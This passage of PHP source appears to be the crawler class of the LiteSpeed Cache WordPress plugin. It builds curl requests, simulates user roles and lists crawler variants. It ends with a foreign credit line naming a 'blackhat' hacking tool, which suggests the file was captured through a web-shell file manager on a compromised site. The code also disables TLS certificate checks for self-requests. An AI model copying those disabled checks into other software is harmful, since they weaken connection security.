			CURLOPT_CUSTOMREQUEST => 'GET',
			CURLOPT_FOLLOWLOCATION => false,
			CURLOPT_ENCODING => 'gzip',
			CURLOPT_CONNECTTIMEOUT => 10,
			CURLOPT_TIMEOUT => $CRAWLER_TIMEOUT, // Larger timeout to avoid incorrect blacklist addition #900171
			CURLOPT_SSL_VERIFYHOST => 0,
			CURLOPT_SSL_VERIFYPEER => false,
			CURLOPT_NOBODY => false,
			CURLOPT_HTTPHEADER => $this->_crawler_conf['headers'],
		);
		$options[CURLOPT_HTTPHEADER][] = 'Cache-Control: max-age=0';

		/**
		 * Try to enable http2 connection (only available since PHP7+)
		 *
		 * @since  1.9.1
		 * @since  2.2.7 Commented due to cause no-cache issue
		 * @since  2.9.1+ Fixed wrongly usage of CURL_HTTP_VERSION_1_1 const
		 */
		$options[CURLOPT_HTTP_VERSION] = CURL_HTTP_VERSION_1_1;

		// Referer
		if (isset($_SERVER['HTTP_HOST']) && isset($_SERVER['REQUEST_URI'])) {
			$options[CURLOPT_REFERER] = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
		}

		// User Agent
		if ($crawler_only) {
			if (strpos($this->_crawler_conf['ua'], self::FAST_USER_AGENT) !== 0) {
				$this->_crawler_conf['ua'] = self::FAST_USER_AGENT . ' ' . $this->_crawler_conf['ua'];
			}
		}
		$options[CURLOPT_USERAGENT] = $this->_crawler_conf['ua'];

		// Cookies: entries with an empty value are left out
		$cookies = array();
		foreach ($this->_crawler_conf['cookies'] as $k => $v) {
			if (!$v) {
				continue;
			}
			$cookies[] = $k . '=' . urlencode($v);
		}
		if ($cookies) {
			$options[CURLOPT_COOKIE] = implode('; ', $cookies);
		}

		return $options;
	}

	/**
	 * Self curl to get HTML content
	 *
	 * @since  3.3
	 * @param string      $url    URL to fetch.
	 * @param string      $ua     User agent to send.
	 * @param mixed       $uid    User id to simulate; falsy for an anonymous request.
	 * @param string|bool $accept Optional `Accept` header value.
	 * @return string|false Response body, or false when the final response code is not 200.
	 */
	public function self_curl( $url, $ua, $uid = false, $accept = false ) {
		$this->_crawler_conf['base'] = site_url();
		$this->_crawler_conf['ua'] = $ua;
		if ($accept) {
			$this->_crawler_conf['headers'] = array( 'Accept: ' . $accept );
		}

		// The flash-hash cookie has to be in place BEFORE the options are built, because
		// _get_curl_options() is what turns `_crawler_conf['cookies']` into CURLOPT_COOKIE.
		// Clear it for anonymous requests so a hash from an earlier call is never reused.
		if ($uid) {
			$this->_crawler_conf['cookies']['litespeed_flash_hash'] = Router::cls()->get_flash_hash($uid);
		} else {
			unset($this->_crawler_conf['cookies']['litespeed_flash_hash']);
		}

		$options = $this->_get_curl_options();

		if ($uid) {
			// Pin the request to the local server IP when simulating a user
			$parsed_url = parse_url($url);
			if (!empty($parsed_url['host'])) {
				$dom = $parsed_url['host'];
				$port = defined('LITESPEED_CRAWLER_LOCAL_PORT') ? LITESPEED_CRAWLER_LOCAL_PORT : '443'; // TODO: need to test port?
				$resolved = $dom . ':' . $port . ':' . $this->_server_ip;
				$options[CURLOPT_RESOLVE] = array( $resolved );
				$options[CURLOPT_DNS_USE_GLOBAL_CACHE] = false;
				$options[CURLOPT_PORT] = $port;
				self::debug('Resolved DNS for ' . $resolved);
			}
		}

		// Only the body is wanted here, and redirects should be followed
		$options[CURLOPT_HEADER] = false;
		$options[CURLOPT_FOLLOWLOCATION] = true;

		$ch = curl_init();
		curl_setopt_array($ch, $options);
		curl_setopt($ch, CURLOPT_URL, $url);
		$result = curl_exec($ch);
		$code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
		curl_close($ch);

		if ($code != 200) {
			self::debug('❌ Response code is not 200 in self_curl() [code] ' . var_export($code, true));
			return false;
		}

		return $result;
	}

	/**
	 * Terminate crawling
	 *
	 * Saves the pending map status list, advances to the next crawler when the current
	 * one reached its end, and stores the summary with the run marked as stopped.
	 *
	 * @since  1.1.0
	 * @access private
	 */
	private function _terminate_running() {
		$this->_map_status_list = $this->cls('Crawler_Map')->save_map_status($this->_map_status_list, $this->_summary['curr_crawler']);

		if ($this->_end_reason == 'end') {
			// Current crawler is fully done
			++$this->_summary['curr_crawler']; // Jump to next crawler
			$this->_summary['last_pos'] = 0; // reset last position
			$this->_summary['last_crawler_total_cost'] = time() - $this->_summary['curr_crawler_beginning_time'];

			$count_crawlers = count($this->list_crawlers());
			if ($this->_summary['curr_crawler'] >= $count_crawlers) {
				self::debug('_terminate_running Touched end, whole crawled. Reload crawler!');
				$this->_summary['curr_crawler'] = 0;
				$this->_summary['done'] = 'touchedEnd'; // log done status
				$this->_summary['last_full_time_cost'] = time() - $this->_summary['this_full_beginning_time'];
			}
		}

		$this->_summary['last_status'] = 'stopped';
		$this->_summary['is_running'] = 0;
		$this->_summary['end_reason'] = $this->_end_reason;
		self::save_summary();
	}

	/**
	 * List all crawlers ( tagA => [ valueA => titleA, ... ] ...)
	 *
	 * The result is built once and then served from `$this->_crawlers`.
	 *
	 * @since    1.9.1
	 * @access   public
	 * @return array List of crawler definitions, one per combination of factor values.
	 */
	public function list_crawlers() {
		if ($this->_crawlers) {
			return $this->_crawlers;
		}

		$crawler_factors = array();

		// Add default Guest crawler
		$crawler_factors['uid'] = array( 0 => __('Guest', 'litespeed-cache') );

		// WebP on/off
		if ($this->conf(Base::O_IMG_OPTM_WEBP)) {
			$crawler_factors['webp'] = array( 1 => $this->cls('Media')->next_gen_image_title() );
			if (apply_filters('litespeed_crawler_webp', false)) {
				$crawler_factors['webp'][0] = '';
			}
		}

		// Guest Mode on/off
		if ($this->conf(Base::O_GUEST)) {
			$vary_name = $this->cls('Vary')->get_vary_name();
			$vary_val = 'guest_mode:1';
			if (!defined('LSCWP_LOG')) {
				$vary_val = md5($this->conf(Base::HASH) . $vary_val);
			}
			$crawler_factors['cookie:' . $vary_name] = array(
				$vary_val => '',
				'_null' => '<font data-balloon-pos="up" aria-label="Guest Mode">👒</font>',
			);
		}

		// Mobile crawler
		if ($this->conf(Base::O_CACHE_MOBILE)) {
			$crawler_factors['mobile'] = array(
				1 => '<font data-balloon-pos="up" aria-label="Mobile">📱</font>',
				0 => '',
			);
		}

		// Role simulation: each configured user id is titled by that user's first role
		foreach ($this->conf(Base::O_CRAWLER_ROLES) as $v) {
			$role_title = '';
			$udata = get_userdata($v);
			if (isset($udata->roles) && is_array($udata->roles)) {
				$tmp = array_values($udata->roles);
				$role_title = array_shift($tmp);
			}
			if (!$role_title) {
				continue;
			}

			$crawler_factors['uid'][$v] = ucfirst($role_title);
		}

		// Cookie crawler
		foreach ($this->conf(Base::O_CRAWLER_COOKIES) as $v) {
			if (empty($v['name'])) {
				continue;
			}
			// A factor without values would make the cross product below empty (i.e. no
			// crawlers at all), and a non-array would warn in foreach, so skip such entries.
			if (empty($v['vals']) || !is_array($v['vals'])) {
				continue;
			}

			$this_cookie_key = 'cookie:' . $v['name'];

			$crawler_factors[$this_cookie_key] = array();

			foreach ($v['vals'] as $v2) {
				$crawler_factors[$this_cookie_key][$v2] =
					$v2 == '_null' ? '' : '<font data-balloon-pos="up" aria-label="Cookie">🍪</font>' . esc_html($v['name']) . '=' . esc_html($v2);
			}
		}

		// Crossing generate the crawler list
		$this->_crawlers = $this->_recursive_build_crawler($crawler_factors);

		return $this->_crawlers;
	}

	/**
	 * Build a crawler list recursively
	 *
	 * Produces the cross product of all factor values. Every resulting item carries one
	 * value per factor plus a `title` joined from the non-empty value titles with ' - '.
	 *
	 * @since 2.8
	 * @access private
	 * @param array $crawler_factors Map of factor name => ( value => title ).
	 * @param array $group           Item built so far by the outer recursion levels.
	 * @param int   $i               Index of the factor handled at this level.
	 * @return array
	 */
	private function _recursive_build_crawler( $crawler_factors, $group = array(), $i = 0 ) {
		$current_factor = array_keys($crawler_factors);
		$current_factor = $current_factor[$i];

		$if_touch_end = $i + 1 >= count($crawler_factors);

		$final_list = array();

		foreach ($crawler_factors[$current_factor] as $k => $v) {
			// Don't alter $group bcos of loop usage
			$item = $group;
			$item['title'] = !empty($group['title']) ? $group['title'] : '';
			if ($v) {
				if ($item['title']) {
					$item['title'] .= ' - ';
				}
				$item['title'] .= $v;
			}
			$item[$current_factor] = $k;

			if ($if_touch_end) {
				$final_list[] = $item;
			} else {
				// Inception: next layer
				$final_list = array_merge($final_list, $this->_recursive_build_crawler($crawler_factors, $item, $i + 1));
			}
		}

		return $final_list;
	}

	/**
	 * Return crawler meta file local path
	 *
	 * The path is returned whether or not the file exists.
	 *
	 * @since    6.1
	 * @access public
	 * @return string
	 */
	public function json_local_path() {
		return LITESPEED_STATIC_DIR . '/crawler/' . $this->_sitemeta;
	}

	/**
	 * Return crawler meta file
	 *
	 * @since    1.1.0
	 * @access public
	 * @return string|false URL of the meta file, or false when the file does not exist locally.
	 */
	public function json_path() {
		if (!file_exists(LITESPEED_STATIC_DIR . '/crawler/' . $this->_sitemeta)) {
			return false;
		}

		return LITESPEED_STATIC_URL . '/crawler/' . $this->_sitemeta;
	}

	/**
	 * Create reset pos file
	 *
	 * Writes the current timestamp to the reset file and marks the crawler as not running.
	 *
	 * @since    1.1.0
	 * @access public
	 */
	public function reset_pos() {
		File::save($this->_resetfile, time(), true);

		self::save_summary(array( 'is_running' => 0 ));
	}

	/**
	 * Display status based by matching crawlers order
	 *
	 * @since  3.0
	 * @access public
	 * @param string $status_row One status character per crawler, in crawler order.
	 * @param string $reason_set Comma separated reasons, positionally matching $status_row.
	 * @return string HTML: one numbered dot per crawler.
	 */
	public function display_status( $status_row, $reason_set ) {
		if (!$status_row) {
			return '';
		}

		$_status_list = array(
			'-' => 'default',
			self::STATUS_MISS => 'primary',
			self::STATUS_HIT => 'success',
			self::STATUS_BLACKLIST => 'danger',
			self::STATUS_NOCACHE => 'warning',
		);

		$reason_set = explode(',', (string) $reason_set);

		$status = '';
		foreach (str_split($status_row) as $k => $v) {
			// The reason list may be shorter than the status row
			$reason = isset($reason_set[$k]) ? $reason_set[$k] : '';
			if ($reason == 'Man') {
				$reason = __('Manually added to blocklist', 'litespeed-cache');
			}
			if ($reason == 'Existed') {
				$reason = __('Previously existed in blocklist', 'litespeed-cache');
			}
			if ($reason) {
				// The reason is stored data: escape it for the attribute context
				$reason = 'data-balloon-pos="up" aria-label="' . esc_attr($reason) . '"';
			}

			// Unknown status characters fall back to the neutral style
			$css = isset($_status_list[$v]) ? $_status_list[$v] : 'default';

			$status .= '<i class="litespeed-dot litespeed-bg-' . $css . '" ' . $reason . '>' . ($k + 1) . '</i>';
		}

		return $status;
	}

	/**
	 * Output info and exit
	 *
	 * @since    1.1.0
	 * @access protected
	 * @param string $msg Error info
	 */
	protected function output( $msg ) {
		if (wp_doing_cron()) {
			echo $msg;
			// exit();
		} else {
			// JSON-encode for the script context: HTML escaping alone does not protect a JS
			// string literal (quotes, backslashes and newlines would break out of it).
			echo '<script>alert(' . wp_json_encode((string) $msg, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT) . ');</script>';
			// exit;
		}
	}

	/**
	 * Handle all request actions from main cls
	 *
	 * Dispatches on the verified request type, then redirects back to the admin page.
	 *
	 * @since  3.0
	 * @access public
	 */
	public function handler() {
		$type = Router::verify_type();

		switch ($type) {
			case self::TYPE_REFRESH_MAP:
				$this->cls('Crawler_Map')->gen(true);
				break;

			case self::TYPE_EMPTY:
				$this->cls('Crawler_Map')->empty_map();
				break;

			case self::TYPE_BLACKLIST_EMPTY:
				$this->cls('Crawler_Map')->blacklist_empty();
				break;

			case self::TYPE_BLACKLIST_DEL:
				if (!empty($_GET['id'])) {
					$this->cls('Crawler_Map')->blacklist_del($_GET['id']);
				}
				break;

			case self::TYPE_BLACKLIST_ADD:
				if (!empty($_GET['id'])) {
					$this->cls('Crawler_Map')->blacklist_add($_GET['id']);
				}
				break;

			case self::TYPE_START: // Handle the ajax request to proceed crawler manually by admin
				self::start_async();
				break;

			case self::TYPE_RESET:
				$this->reset_pos();
				break;

			default:
				break;
		}

		Admin::redirect();
	}
}
© 2022 - 2023 WIBUHAXOR V1 By Lutfifakee || Padang Blackhat